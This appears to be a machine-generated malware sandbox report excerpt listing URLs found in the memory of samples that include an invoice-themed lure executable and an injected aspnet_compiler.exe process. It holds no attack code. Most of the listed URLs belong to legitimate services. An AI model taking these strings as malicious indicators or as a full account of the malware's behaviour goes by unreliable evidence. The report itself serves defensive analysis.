Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: bhvF833.tmp.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: aspnet_compiler.exe, 00000010.00000002.374830340.00000000009EA000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001B.00000002.392736661.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000020.00000002.416712597.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000024.00000002.432581722.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/
Source: aspnet_compiler.exe, 00000029.00000002.453919934.000000000135A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/B
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/
Source: aspnet_compiler.exe, 0000000E.00000003.388842971.0000000002746000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401780181.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405195939.0000000002A86000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436504638.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433788536.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463221264.0000000003003000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.466714622.0000000003006000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.487705843.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481529759.00000000028A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.504317340.0000000000A46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500729020.0000000000A43000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386489638.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: aspnet_compiler.exe, 0000000E.00000002.397869869.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.477360003.0000000000FB4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.502161495.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000002.513031021.00000000001B3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: aspnet_compiler.exe, 0000001D.00000002.452238930.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldll
Source: aspnet_compiler.exe, 00000013.00000002.420022464.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllD
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
